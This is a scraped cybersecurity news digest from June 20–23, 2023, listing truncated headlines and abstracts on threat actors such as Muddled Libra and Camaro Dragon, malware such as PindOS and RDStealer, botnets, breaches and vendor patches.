A threat actor known as Muddled Libra is targeting the business process outsourcing (BPO) industry with persistent attacks that leverage advanced social engineering ploys to gain initial access. "The attack style defining Muddled Libra appeared on the cybersecurity radar in late 2022 with the release of the 0ktapus phishing kit, which offered a prebuilt hosting framework and bundled templates," Palo Alto Networks Unit 42 said in a technical report. Libra is the designation given by the cybersecurity company for cybercrime groups. The "muddled" moniker for the threat actor stems from the prevailing ambiguity with regards to the use of the 0ktapus framework. 0ktapus , also known as Scatter Swine, refers to an intrusion set that first came to light in August 2022 in connection with smishing attacks against over 100 organizations, including Twilio and Cloudflare. Then in late 2022, CrowdStrike detailed a string of cyber assaults aimed at telecom and BPO coThe Hacker News
June 23, 2023 – Solution
A New Kill Chain Approach to Disrupting Online Threats Full Text
Abstract
The defender community has learned a great deal since the 2016 U.S. election, but it still needs to find a common language.Lawfare
June 23, 2023 – Government
CISA orders govt agencies to fix recently disclosed flaws in Apple devices Full Text
Abstract
U.S. Cybersecurity and Infrastructure Security Agency (CISA) added six new vulnerabilities to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added six new security flaws to its Known...Security Affairs
June 23, 2023 – Business
Google announces $20 million investment for cyber clinics Full Text
Abstract
By deploying students to community organizations to improve digital defenses, university cybersecurity clinics aim to give students cybersecurity experience, improve local defensive capacity and steer students toward work in cybersecurity.Cyware
June 23, 2023 – Education
The Power of Browser Fingerprinting: Personalized UX, Fraud Detection, and Secure Logins Full Text
Abstract
The case for browser fingerprinting: personalizing user experience, improving fraud detection, and optimizing login security Have you ever heard of browser fingerprinting? You should! It's an online user identification technique that collects information about a visitor's web browser and its configuration preferences to associate individual browsing sessions with a single website visitor. With browser fingerprinting, many pieces of data can be collected about a user's web browser and device, such as screen resolution, location, language, and operating system. When you stitch these pieces together, they reveal a unique combination of information that forms every user's visitor ID or "digital fingerprint." Websites can use the visitor ID in various ways, including personalizing the user's experience, improving fraud detection, and optimizing login security. This article discusses the case for browser fingerprinting and how to use it safely on your websiThe Hacker News
June 23, 2023 – Vulnerabilities
VMware fixed five memory corruption issues in vCenter Server Full Text
Abstract
VMware addressed multiple memory corruption vulnerabilities in vCenter Server that can be exploited to achieve remote code execution. VMware released security updates to five memory corruption vulnerabilities (CVE-2023-20892, CVE-2023-20893, CVE-2023-20894,...Security Affairs
June 23, 2023 – Policy and Law
MOVEit Data Breach Victims Sue Progress Software Full Text
Abstract
Fallout for Progress Software continues over a massive data breach that appears to have affected hundreds of private and public sector organizations that use its MOVEit file transfer software.Cyware
June 23, 2023 – Malware
Powerful JavaScript Dropper PindOS Distributes Bumblebee and IcedID Malware Full Text
Abstract
A new strain of JavaScript dropper has been observed delivering next-stage payloads like Bumblebee and IcedID. Cybersecurity firm Deep Instinct is tracking the malware as PindOS , which contains the name in its " User-Agent " string. Both Bumblebee and IcedID serve as loaders, acting as a vector for other malware on compromised hosts, including ransomware. A recent report from Proofpoint highlighted IcedID's abandoning of banking fraud features to solely focus on malware delivery. Bumblebee , notably, is a replacement for another loader called BazarLoader , which has been attributed to the now-defunct TrickBot and Conti groups. A report from Secureworks in April 2022 found evidence of collaboration between several actors in the Russian cybercrime ecosystem, including that of Conti , Emotet , and IcedID. Deep Instinct's source code analysis of PindOS shows that it contains comments in Russian, raising the possibility of a continued partnership betweenThe Hacker News
June 23, 2023 – Vulnerabilities
Fortinet fixes critical FortiNAC RCE, install updates asap Full Text
Abstract
Fortinet addressed a critical remote command execution vulnerability, tracked as CVE-2023-33299, affecting FortiNAC solution. FortiNAC is a network access control (NAC) solution designed by Fortinet that is used by organizations to secure and control...Security Affairs
June 23, 2023 – Botnet
New Mirai botnet targets tens of flaws in popular IoT devices Full Text
Abstract
The botnet has been observed targeting IoT devices, routers, DVRs, access control systems, and Solar power generation monitoring systems from brands such as D-Link, Arris, Zyxel, TP-Link, Tenda, Netgear, and MediaTek.Cyware
June 23, 2023 – Government
NSA Releases Guide to Combat Powerful BlackLotus Bootkit Targeting Windows Systems Full Text
Abstract
The U.S. National Security Agency (NSA) on Thursday released guidance to help organizations detect and prevent infections of a Unified Extensible Firmware Interface ( UEFI ) bootkit called BlackLotus . To that end, the agency is recommending that "infrastructure owners take action by hardening user executable policies and monitoring the integrity of the boot partition." BlackLotus is an advanced crimeware solution that was first spotlighted in October 2022 by Kaspersky. A UEFI bootkit capable of bypassing Windows Secure Boot protections, samples of the malware have since emerged in the wild. This is accomplished by taking advantage of a known Windows flaw called Baton Drop ( CVE-2022-21894 , CVSS score: 4.4) discovered in vulnerable boot loaders not added into the Secure Boot DBX revocation list . The vulnerability was addressed by Microsoft in January 2022. This loophole could be exploited by threat actors to replace fully patched boot loaders with vulnerable vThe Hacker News
June 23, 2023 – Government
Federal incentives could help utilities overcome major cybersecurity hurdle: money Full Text
Abstract
A new cyber incentive framework from the Federal Energy Regulatory Commission could help utilities adapt to new threats at a faster pace, by providing flexibility for them to invest in pre-qualified cybersecurity measures.Cyware
June 23, 2023 – Cryptocurrency
New Cryptocurrency Mining Campaign Targets Linux Systems and IoT Devices Full Text
Abstract
Internet-facing Linux systems and Internet of Things (IoT) devices are being targeted as part of a new campaign designed to illicitly mine cryptocurrency. "The threat actors behind the attack use a backdoor that deploys a wide array of tools and components such as rootkits and an IRC bot to steal device resources for mining operations," Microsoft threat intelligence researcher Rotem Sde-Or said . "The backdoor also installs a patched version of OpenSSH on affected devices, allowing threat actors to hijack SSH credentials, move laterally within the network, and conceal malicious SSH connections." To pull off the scheme, misconfigured Linux hosts are brute-forced to gain initial access, following which the threat actors move to disable shell history and fetch a trojanized version of OpenSSH from a remote server. The rogue OpenSSH package is configured to install and launch the backdoor, a shell script that allows the attackers to distribute additional payloads aThe Hacker News
June 23, 2023 – Policy and Law
Data Breach Lawsuit Alleges Mismanagement of 3rd-Party Risk Full Text
Abstract
A proposed federal class action lawsuit alleges that patient debt collection software firm Intellihartx was negligent in its handling of third-party risk, contributing to a breach affecting nearly 490,000 individuals.Cyware
June 23, 2023 – Vulnerabilities
More than a million GitHub repositories potentially vulnerable to RepoJacking Full Text
Abstract
Researchers reported that millions of GitHub repositories are likely vulnerable to an attack called RepoJacking. A study conducted by Aqua researchers revealed that millions of GitHub repositories are potentially vulnerable to RepoJacking. In...Security Affairs
June 22, 2023 – Vulnerabilities
GitHub Dataset Research Reveals Millions Potentially Vulnerable to RepoJacking Full Text
Abstract
RepoJacking is a security vulnerability that may lead to code execution on organizations' internal or customer environments. Millions of GitHub repositories are potentially vulnerable to it, including popular organizations such as Google and Lyft.Cyware
June 22, 2023 – Phishing
MULTI#STORM Campaign Targets India and U.S. with Remote Access Trojans Full Text
Abstract
A new phishing campaign codenamed MULTI#STORM has set its sights on India and the U.S. by leveraging JavaScript files to deliver remote access trojans on compromised systems. "The attack chain ends with the victim machine infected with multiple unique RAT (remote access trojan) malware instances, such as Warzone RAT and Quasar RAT," Securonix researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said . "Both are used for command-and-control during different stages of the infection chain." The multi-stage attack chain commences when an email recipient clicks the embedded link pointing to a password-protected ZIP file ("REQUEST.zip") hosted on Microsoft OneDrive with the password "12345." Extracting the archive file reveals a heavily obfuscated JavaScript file ("REQUEST.js") that, when double clicked, activates the infection by executing two PowerShell commands that are responsible for retrieving two separate payloads from OneDriThe Hacker News
June 22, 2023 – Malware
Researchers Reverse Engineer Flutter-based Fluhorse Android Malware Full Text
Abstract
The malware poses as a legitimate app for an electronic toll system used in Southern Asia and steals user credentials and 2FA codes. The malware is distributed via email phishing campaigns and has been downloaded over 100,000 times.Cyware
June 22, 2023 – Education<br {:=”” .fs-4=”” .fw-700=”” .lh-0=”” }=”” <p=”” style=”font-weight:500; margin:0px” markdown=”1”> Generative-AI apps & ChatGPT: Potential risks and mitigation strategies Full Text
Abstract
Losing sleep over Generative-AI apps? You're not alone or wrong. According to the Astrix Security Research Group, mid size organizations already have, on average, 54 Generative-AI integrations to core systems like Slack, GitHub and Google Workspace and this number is only expected to grow. Continue reading to understand the potential risks and how to minimize them. Book a Generative-AI Discovery session with Astrix Security's experts (free - no strings attached - agentless & zero friction) "Hey ChatGPT, review and optimize our source code" "Hey Jasper.ai, generate a summary email of all our net new customers from this quarter" "Hey Otter.ai, summarize our Zoom board meeting" In this era of financial turmoil, businesses and employees alike are constantly looking for tools to automate work processes and increase efficiency and productivity by connecting third party apps to core business systems such as Google workspace, Slack and GitHubThe Hacker News
June 22, 2023 – Botnet
New Mirai botnet targets tens of flaws in popular IoT devices Full Text
Abstract
Since March 2023, Unit 42 researchers have observed a variant of the Mirai botnet spreading by targeting tens of flaws in D-Link, Zyxel, and Netgear devices. Since March 2023, researchers at Palo Alto Networks Unit 42 have observed a new variant of the Mirai...Security Affairs
June 22, 2023 – Breach
Third-Party Vendor Exposes 3CX Data via Unsecured Elasticsearch and Kibana Instances Full Text
Abstract
A third-party vendor of 3CX left an open server and exposed sensitive data. Attackers could use the exposed call metadata, license keys, and database connection strings to spy on 3CX clients or launch more sophisticated attacks.Cyware
June 22, 2023 – General
Alert: Million of GitHub Repositories Likely Vulnerable to RepoJacking Attack Full Text
Abstract
Millions of software repositories on GitHub are likely vulnerable to an attack called RepoJacking , a new study has revealed. This includes repositories from organizations such as Google, Lyft, and several others, Massachusetts-based cloud-native security firm Aqua said in a Wednesday report. The supply chain vulnerability, also known as dependency repository hijacking, is a class of attacks that makes it possible to take over retired organization or user names and publish trojanized versions of repositories to run malicious code. "When a repository owner changes their username, a link is created between the old name and the new name for anyone who downloads dependencies from the old repository," researchers Ilay Goldman and Yakir Kadkoda said. "However, it is possible for anyone to create the old username and break this link." Alternatively, a similar scenario could arise when a repository ownership is transferred to another user and the original accountThe Hacker News
June 22, 2023 – Malware
Researchers released a PoC exploit for CVE-2023-20178 flaw in Cisco AnyConnect Secure Full Text
Abstract
The proof-of-concept (PoC) exploit code for high-severity vulnerability (CVE-2023-20178) in Cisco AnyConnect Secure was published online. A security researcher has published a proof-of-concept (PoC) exploit code for the high-severity vulnerability,...Security Affairs
June 22, 2023 – General
British law firms warned to upgrade cyber defenses against ransomware attacks Full Text
Abstract
Law firms in Britain were warned on Thursday to upgrade their cyber defenses in the wake of a number of ransomware attacks that led to sensitive and potentially legally privileged information being stolen by criminals and published online.Cyware
June 22, 2023 – Hacker
Camaro Dragon Hackers Strike with USB-Driven Self-Propagating Malware Full Text
Abstract
The Chinese cyber espionage actor known as Camaro Dragon has been observed leveraging a new strain of self-propagating malware that spreads through compromised USB drives. "While their primary focus has traditionally been Southeast Asian countries, this latest discovery reveals their global reach and highlights the alarming role USB drives play in spreading malware," Check Point said in new research shared with The Hacker News. The cybersecurity company, which found evidence of USB malware infections in Myanmar, South Korea, Great Britain, India, and Russia, said the findings are the result of a cyber incident that it investigated at an unnamed European hospital in early 2023. The probe found that the entity was not directly targeted by the adversary but rather suffered a breach via an employee's USB drive, which became infected when it was plugged into a colleague's computer at a conference in Asia. "Consequently, upon returning to the healthcare instituThe Hacker News
June 22, 2023 – Breach
Norton parent firm Gen Digital, was victim of a MOVEit ransomware attack too Full Text
Abstract
Norton parent firm, Gen Digital, was the victim of a ransomware attack that exploited the recently disclosed MOVEit zero-day vulnerability. Gen Digital Inc. (formerly Symantec Corporation and NortonLifeLock) is a multinational software company that...Security Affairs
June 22, 2023 – Cryptocurrency
Ukrainian Police Disrupt Cryptocurrency Scam Aimed at Canada Full Text
Abstract
Ukrainian and Canadian authorities conducted a joint operation to disrupt the two call centers and confiscate computer equipment, mobile phones, SIM cards, cars, and cash.Cyware
June 22, 2023 – Education
Unveiling the Unseen: Identifying Data Exfiltration with Machine Learning Full Text
Abstract
Why Data Exfiltration Detection is Paramount? The world is witnessing an exponential rise in ransomware and data theft employed to extort companies. At the same time, the industry faces numerous critical vulnerabilities in database software and company websites. This evolution paints a dire picture of data exposure and exfiltration that every security leader and team is grappling with. This article highlights this challenge and expounds on the benefits that Machine Learning algorithms and Network Detection & Response (NDR) approaches bring to the table. Data exfiltration often serves as the final act of a cyberattack, making it the last window of opportunity to detect the breach before the data is made public or is used for other sinister activities, such as espionage. However, data leakage isn't only an aftermath of cyberattacks, it can also be a consequence of human error. While prevention of data exfiltration through security controls is ideal, the escalating complexity aThe Hacker News
June 22, 2023 – Vulnerabilities
Apple addressed actively exploited zero-day flaws in iOS, macOS, and Safari Full Text
Abstract
Apple rolled out security updates to address actively exploited zero-day flaws in iOS, iPadOS, macOS, watchOS, and Safari. Apple addressed a set of vulnerabilities in iOS, iPadOS, macOS, watchOS, and the Safari browser that were actively exploited...Security Affairs
June 22, 2023 – Hacker
Russian hacking group puts fresh emphasis on stealing credentials Full Text
Abstract
These attacks by APT29 (aka Cozy Bear, Nobelium, or Midnight Blizzard) are directed at governments, IT service providers, nongovernmental organizations (NGOs), and defense and critical manufacturing industries.Cyware
June 22, 2023 – Vulnerabilities
Critical Flaw Found in WordPress Plugin for WooCommerce Used by 30,000 Websites Full Text
Abstract
A critical security flaw has been disclosed in the WordPress "Abandoned Cart Lite for WooCommerce" plugin that's installed on more than 30,000 websites. "This vulnerability makes it possible for an attacker to gain access to the accounts of users who have abandoned their carts, who are typically customers but can extend to other high-level users when the right conditions are met," Defiant's Wordfence said in an advisory. Tracked as CVE-2023-2986, the shortcoming has been rated 9.8 out of 10 for severity on the CVSS scoring system. It impacts all versions of the plugin, including and prior to versions 5.14.2. The problem, at its core, is a case of authentication bypass that arises as a result of insufficient encryption protections that are applied when customers are notified when they have abandoned their shopping carts on e-commerce sites without completing the purchase. Specifically, the encryption key is hard-coded in the plugin, thereby allowingThe Hacker News
June 22, 2023 – Malware
Analyzing the TriangleDB implant used in Operation Triangulation Full Text
Abstract
Kaspersky provided more details about Operation Triangulation, including the exploitation chain and the implant used by the threat actors. Kaspersky researchers dug into Operation Triangulation and discovered more details about the exploit chain employed...Security Affairs
June 22, 2023 – Outage
Hawaiʻi Community College Hit with NoEscape Ransomware Attack Full Text
Abstract
Hawai?i Community College is the latest university to deal with a ransomware attack, announcing on Tuesday night that it was forced to shut off its network and contact federal authorities about the incident.Cyware
June 22, 2023 – Vulnerabilities<br {:=”” .fs-4=”” .fw-700=”” .lh-0=”” }=”” <p=”” style=”font-weight:500; margin:0px” markdown=”1”> Zero-Day Alert: Apple Releases Patches for Actively Exploited Flaws in iOS, macOS, and Safari Full Text
Abstract
Apple on Wednesday released a slew of updates for iOS, iPadOS, macOS, watchOS, and Safari browser to address a set of flaws it said were actively exploited in the wild. This includes a pair of zero-days that have been weaponized in a mobile surveillance campaign called Operation Triangulation that has been active since 2019. The exact threat actor behind the activity is not known. CVE-2023-32434 - An integer overflow vulnerability in the Kernel that could be exploited by a malicious app to execute arbitrary code with kernel privileges. CVE-2023-32435 - A memory corruption vulnerability in WebKit that could lead to arbitrary code execution when processing specially crafted web content. The iPhone maker said it's aware that the two issues "may have been actively exploited against versions of iOS released before iOS 15.7," crediting Kaspersky researchers Georgy Kucherin, Leonid Bezvershenko, and Boris Larin for reporting them. The advisory comes as the RussiaThe Hacker News
June 22, 2023 – General<br {:=”” .fs-4=”” .fw-700=”” .lh-0=”” }=”” <p=”” style=”font-weight:500; margin:0px” markdown=”1”> CISOs’ New Stressors Brought on by Digitalization: Report Full Text
Abstract
Salt Security surveyed an international selection of 300 CISOs and CSOs to examine the cybersecurity ramifications of digitalization – and it is worth noting that almost 90% of them said that digital transformation introduces unforeseen risks.Cyware
June 22, 2023 – Malware
RDStealer Compromises Remote Desktop Drives for Data Theft Full Text
Abstract
Researchers took the wraps off of a year-long cyberattack campaign deploying a custom Golang malware called RDStealer. The malware strain focuses on stealing credentials and extracting data from compromised hosts. Not a coincidence but all the compromised machines were Dell-manufactured devices.Cyware
June 21, 2023 – Hacker
ScarCruft Hackers Exploit Ably Service for Stealthy Wiretapping Attacks Full Text
Abstract
The North Korean threat actor known as ScarCruft has been observed using an information-stealing malware with previous undocumented wiretapping features as well as a backdoor developed using Golang that exploits the Ably real-time messaging service. "The threat actor sent their commands through the Golang backdoor that is using the Ably service," the AhnLab Security Emergency response Center (ASEC) said in a technical report. "The API key value required for command communication was saved in a GitHub repository." ScarCruft is a state-sponsored outfit with links to North Korea's Ministry of State Security (MSS). It's known to be active since at least 2012. Attack chains mounted by the group entail the use of spear-phishing lures to deliver RokRAT , although it has leveraged a wide range of other custom tools to harvest sensitive information. In the latest intrusion detected by ASEC, the email comes bearing a Microsoft Compiled HTML Help (.CHM) file --The Hacker News
June 21, 2023
Russia-linked APT28 hacked Roundcube email servers of Ukrainian entities Full Text
Abstract
Russia-linked APT28 group hacked into Roundcube email servers belonging to multiple Ukrainian organizations. A joint investigation conducted by Ukraine's Computer Emergency Response Team (CERT-UA) and Recorded Future revealed that the Russia-linked...Security Affairs
June 21, 2023 – Vulnerabilities
Critical WordPress Plugin Vulnerabilities Impact Thousands of Sites Full Text
Abstract
The first security defect, tracked as CVE-2023-2986 (CVSS score 9.8/10), impacts the Abandoned Cart Lite for WooCommerce, a plugin that notifies customers who did not complete the purchase process, and which has more than 30,000 active installations.Cyware
June 21, 2023 – Malware
New Report Exposes Operation Triangulation’s Spyware Implant Targeting iOS Devices Full Text
Abstract
More details have emerged about the spyware implant that's delivered to iOS devices as part of a campaign called Operation Triangulation. Kaspersky, which discovered the operation after becoming one of the targets at the start of the year, said the malware has a lifespan of 30 days, after which it gets automatically uninstalled unless the time period is extended by the attackers. The Russian cybersecurity company has codenamed the backdoor TriangleDB . "The implant is deployed after the attackers obtain root privileges on the target iOS device by exploiting a kernel vulnerability," Kaspersky researchers said in a new report published today. "It is deployed in memory, meaning that all traces of the implant are lost when the device gets rebooted. Therefore, if the victim reboots their device, the attackers have to reinfect it by sending an iMessage with a malicious attachment, thus launching the whole exploitation chain again." Operation TriangulationThe Hacker News
June 21, 2023 – Botnet
New Condi DDoS botnet targets TP-Link Wi-Fi routers Full Text
Abstract
Researchers discovered a new strain of malware called Condi that targets TP-Link Archer AX21 (AX1800) Wi-Fi routers. Fortinet FortiGuard Labs Researchers discovered a new strain of malware called Condi that was observed exploiting a vulnerability...Security Affairs
June 21, 2023 – Ransomware
May ransomware activity rises behind 8base, LockBit gangs Full Text
Abstract
LockBit was the most active group last month, but NCC Group researchers were surprised by 8base, which started listing victims from attacks that occurred beginning in April 2022.Cyware
June 21, 2023 – Education
Startup Security Tactics: Friction Surveys Full Text
Abstract
When we do quarterly planning , my team categorizes our goals within four evergreen outcomes: Reduce the risk of information security incidents Increase trust in Vanta's information security program Reduce the friction caused by information security controls Use security expertise to support the business In this article, I'm going to focus on number three: reducing friction. Declaring your intentions There is value in making "reducing friction" an explicit goal of your security program. It sets the right tone with your counterparts across the organization, and is one step toward building a positive security culture. The first time I presented those outcomes in a company-wide forum, I received a Slack message from a senior leader who had just joined the company: "fantastic to hear about the security's teams focus on removing invisible security controls. Excellent philosophy for the security team [...] its just awesome too many security teams viThe Hacker News
June 21, 2023 – Vulnerabilities
Critical RCE flaw CVE-2023-20887 in VMware vRealize exploited in the wild Full Text
Abstract
VMware is warning customers that critical remote code execution vulnerability CVE-2023-20887 is being actively exploited in attacks. VMware is warning customers that a critical remote code execution vulnerability in Aria Operations for Networks (Formerly...Security Affairs
June 21, 2023 – General
US and European IT decision-makers have different cloud security priorities Full Text
Abstract
The growing adoption of cloud has elevated cloud security fear for IT teams, as they grapple with the challenges and concerns arising from the widespread use of complex cloud environments while diligently addressing them, according to SUSE.Cyware
June 21, 2023 – Vulnerabilities
Critical ‘nOAuth’ Flaw in Microsoft Azure AD Enabled Complete Account Takeover Full Text
Abstract
A security shortcoming in Microsoft Azure Active Directory (AD) Open Authorization ( OAuth ) process could have been exploited to achieve full account takeover, researchers said. California-based identity and access management service Descope, which discovered and reported the issue in April 2023, dubbed it nOAuth . "nOAuth is an authentication implementation flaw that can affect Microsoft Azure AD multi-tenant OAuth applications," Omer Cohen, chief security officer at Descope, said . The misconfiguration has to do with how a malicious actor can modify email attributes under "Contact Information" in the Azure AD account and exploit the "Log in with Microsoft" feature to hijack a victim account. To pull off the attack, all an adversary has to do is to create and access an Azure AD admin account and modify their email address to that of a victim and take advantage of the single sign-on scheme on a vulnerable app or website. "If the app merges uThe Hacker News
June 21, 2023 – Government
New DOJ unit will focus on prosecuting nation-state cybercrime Full Text
Abstract
The decision to put cyber on equal footing with the division’s three existing sections comes as the DOJ has ramped up its own efforts to defeat botnets, contain or eliminate malware outbreaks and pursue digital criminals around the globe.Cyware
June 21, 2023 – Hacker
Chinese Hacker Group ‘Flea’ Targets American Ministries with Graphican Backdoor Full Text
Abstract
Foreign affairs ministries in the Americas have been targeted by a Chinese state-sponsored actor named Flea as part of a recent campaign that spanned from late 2022 to early 2023. The cyber attacks, per Broadcom's Symantec, involved a new backdoor codenamed Graphican. Some of the other targets included a government finance department and a corporation that markets products in the Americas as well as one unspecified victim in an European country. "Flea used a large number of tools in this campaign," the company said in a report shared with The Hacker News, describing the threat actor as "large and well-resourced." "As well as the new Graphican backdoor, the attackers leveraged a variety of living-off-the-land tools, as well as tools that have been previously linked to Flea." Flea, also called APT15, BackdoorDiplomacy, ke3chang, Nylon Typhoon (formerly Nickel), Playful Taurus, Royal APT, and Vixen Panda, is an advanced persistent threat group thaThe Hacker News
June 21, 2023 – General
Organizations actively embrace zero trust, integration remains a hurdle Full Text
Abstract
IT teams have made security efforts and progress in zero-trust implementation strategies to establish a new sense of normalcy following the network upheaval caused by the start of the global pandemic.Cyware
June 21, 2023 – Malware
New Condi Malware Hijacking TP-Link Wi-Fi Routers for DDoS Botnet Attacks Full Text
Abstract
A new malware called Condi has been observed exploiting a security vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers to rope the devices into a distributed denial-of-service (DDoS) botnet. Fortinet FortiGuard Labs said the campaign has ramped up since the end of May 2023. Condi is the work of a threat actor who goes by the online alias zxcr9999 on Telegram and runs a Telegram channel called Condi Network to advertise their warez. "The Telegram channel was started in May 2022, and the threat actor has been monetizing its botnet by providing DDoS-as-a-service and selling the malware source code," security researchers Joie Salvio and Roy Tay said. An analysis of the malware artifact reveals its ability to terminate other competing botnets on the same host. It, however, lacks a persistence mechanism, meaning the program cannot survive a system reboot. To get around this limitation, the malware deletes multiple binaries that are used to shut down or reboot theThe Hacker News
June 21, 2023 – Botnet
Tsunami Botnet Found Targeting Unsecured Linux SSH Servers Full Text
Abstract
An unidentified cybercrime group was observed brute-forcing vulnerable Linux SSH servers to drop various malware strains, including the Tsunami DDoS bot. Tsunami, also known as Kaiten, is used by a multitude of threat actors as the source code of the botnet is publicly available. administrator ... Read MoreCyware
June 21, 2023 – Vulnerabilities
Alert! Hackers Exploiting Critical Vulnerability in VMware’s Aria Operations Networks Full Text
Abstract
VMware has flagged that a recently patched critical command injection vulnerability in Aria Operations for Networks (formerly vRealize Network Insight) has come under active exploitation in the wild. The flaw, tracked as CVE-2023-20887 , could allow a malicious actor with network access to the product to perform a command injection attack, resulting in remote code execution. It impacts VMware Aria Operations Networks versions 6.x, with fixes released in versions 6.2, 6.3, 6.4, 6.5.1, 6.6, 6.7, 6.8, 6.9, and 6.10 on June 7, 2023. Now according to an update shared by the virtualization services provider on June 20, 2023, the flaw has been weaponized in real-world attacks, although the exact specifics are unknown as yet. "VMware has confirmed that exploitation of CVE-2023-20887 has occurred in the wild," the company noted . Data gathered by threat intelligence firm GreyNoise shows active exploitation of the flaw from two different IP addresses located in the NetherlThe Hacker News
June 20, 2023 – Vulnerabilities
OT:Icefall: Vulnerabilities Identified in Wago Controllers Full Text
Abstract
The flaws were identified as part of the OT:Icefall research that has led to the public disclosure of 61 vulnerabilities impacting more than 100 OT products from 13 vendors.Cyware
June 20, 2023 – Vulnerabilities
Researchers Expose New Severe Flaws in Wago and Schneider Electric OT Products Full Text
Abstract
Three security vulnerabilities have been disclosed in operational technology (OT) products from Wago and Schneider Electric. The flaws, per Forescout, are part of a broader set of shortcomings collectively called OT:ICEFALL , which now comprises a total of 61 issues spanning 13 different vendors. "OT:ICEFALL demonstrates the need for tighter scrutiny of, and improvements to, processes related to secure design, patching and testing in OT device vendors," the company said in a report shared with The Hacker News. The most severe of the flaws is CVE-2022-46680 (CVSS score: 8.8), which concerns the plaintext transmission of credentials in the ION/TCP protocol used by power meters from Schneider Electric. Successful exploitation of the bug could enable threat actors to gain control of vulnerable devices. It's worth noting that CVE-2022-46680 is one among the 56 flaws originally unearthed by Forescout in June 2022. The other two new security holes ( CVE-2023The Hacker News
June 20, 2023 – Breach
3CX data exposed, third-party to blame Full Text
Abstract
A third-party vendor of 3CX, a popular Voice over Internet Protocol (VoIP) comms provider, left an open server and exposed sensitive 3CX data. The issue went under the company’s radar, even though it was recently targeted by North Korean hackers. While...Security Affairs
June 20, 2023 – Denial Of Service
Compromised Linux SSH servers engage in DDoS attacks, cryptomining Full Text
Abstract
A threat actor is mounting dictionary attacks to log into Linux servers with SSH installed and saddle the server with the Tsunami and ShellBot DDoS bots, the XMRig CoinMiner program, and Log Cleaner – a tool for deleting and modifying logs.Cyware
June 20, 2023 – Vulnerabilities
Zyxel Releases Urgent Security Updates for Critical Vulnerability in NAS Devices Full Text
Abstract
Zyxel has rolled out security updates to address a critical security flaw in its network-attached storage (NAS) devices that could result in the execution of arbitrary commands on affected systems. Tracked as CVE-2023-27992 (CVSS score: 9.8), the issue has been described as a pre-authentication command injection vulnerability. "The pre-authentication command injection vulnerability in some Zyxel NAS devices could allow an unauthenticated attacker to execute some operating system (OS) commands remotely by sending a crafted HTTP request," Zyxel said in an advisory published today. Andrej Zaujec, NCSC-FI, and Maxim Suslov have been credited with discovering and reporting the flaw. The following versions are impacted by CVE-2023-27992 - NAS326 (V5.21(AAZF.13)C0 and earlier, patched in V5.21(AAZF.14)C0), NAS540 (V5.21(AATB.10)C0 and earlier, patched in V5.21(AATB.11)C0), and NAS542 (V5.21(ABAG.10)C0 and earlier, patched in V5.21(ABAG.11)C0) The alert comes two weeksThe Hacker News
June 20, 2023 – Botnet
New Tsunami botnet targets Linux SSH servers Full Text
Abstract
Researchers warn of an ongoing Tsunami DDoS botnet campaign targeting inadequately protected Linux SSH servers. Researchers from AhnLab Security Emergency response Center (ASEC) have uncovered an ongoing hacking campaign, aimed at poorly protected...Security Affairs
June 20, 2023 – Phishing
Phishing scam takes $950k from DoorDash drivers Full Text
Abstract
The scam involved placing bogus orders, contacting drivers claiming to be from the DoorDash support team, and convincing them to hand over banking details or log in to a fake portal.Cyware
June 20, 2023 – Solution
SaaS in the Real World: How Global Food Chains Can Secure Their Digital Dish Full Text
Abstract
The Quick Serve Restaurant (QSR) industry is built on consistency and shared resources. National chains like McDonald's and regional ones like Cracker Barrel grow faster by reusing the same business model, decor, and menu, with little change from one location to the next. QSR technology stacks mirror the consistency of the front end of each store. Despite each franchise being independently owned and operated, they share subscriptions to SaaS applications, or use multiple tenants of the same application. Each app is typically segmented by store. Corporate IT and Security has access to the entire database, while each franchise has visibility into its own data. These SaaS apps cover everything from CRMs to supply chains to marketing and HR. The data within is used to understand consumer habits, improve marketing campaigns, and manage employees. Like every other industry, QSR SaaS apps contain a wealth of data that needs to be secured. At the same time, we're seeing food chaThe Hacker News
June 20, 2023 – Vulnerabilities
Zyxel addressed critical flaw CVE-2023-27992 in NAS Devices Full Text
Abstract
Zyxel released security updates to address a critical vulnerability affecting its network-attached storage (NAS) devices. Zyxel released security updates to address a critical security flaw, tracked as CVE-2023-27992 (CVSS score: 9.8), affecting...Security Affairs
June 20, 2023 – Malware
Inside of the WASP’s nest: deep dive into PyPI-hosted malware Full Text
Abstract
Virustotal experts identified a number of specific PyPI-based malware campaigns, including Discord Token Grabber V2, Hazard Token Grabber V2, Chromium Stealer, and W4SP Stealer (with Hyperion obfuscator).Cyware
June 20, 2023 – Attack
Experts Uncover Year-Long Cyber Attack on IT Firm Utilizing Custom Malware RDStealer Full Text
Abstract
A highly targeted cyber attack against an East Asian IT company involved the deployment of a custom malware written in Golang called RDStealer . "The operation was active for more than a year with the end goal of compromising credentials and data exfiltration," Bitdefender security researcher Victor Vrabie said in a technical report shared with The Hacker News. Evidence gathered by the Romanian cybersecurity firm shows that the campaign started in early 2022. The target was an unspecified IT company located in East Asia. In the early phases, the operation relied on readily available remote access trojans like AsyncRAT and Cobalt Strike, before transitioning to bespoke malware in late 2021 or early 2022 in a bid to thwart detection. A primary evasion tactic concerns the use of Microsoft Windows folders that are likely to be excluded from scanning by security software (e.g., System32 and Program Files) to store the backdoor payloads. One of the sub-folders in questionThe Hacker News
June 20, 2023 – Solution
Tackling Data Sovereignty with DDR Full Text
Abstract
Data-centric distributed resilience (DDR) offers a compelling approach to addressing data sovereignty in cybersecurity. As much of our modern life relies upon the cloud, the question of data protection is front of mind for many organizations. Those...Security Affairs
June 20, 2023 – Vulnerabilities
Western Digital Blocks Unpatched Devices From Cloud Services Full Text
Abstract
The move, which began on June 15, comes one month after the company released firmware updates for its My Cloud product line to address multiple security defects, including a critical path traversal bug that leads to remote code execution (RCE).Cyware
June 20, 2023 – Vulnerabilities
ASUS Releases Patches to Fix Critical Security Bugs Impacting Multiple Router Models Full Text
Abstract
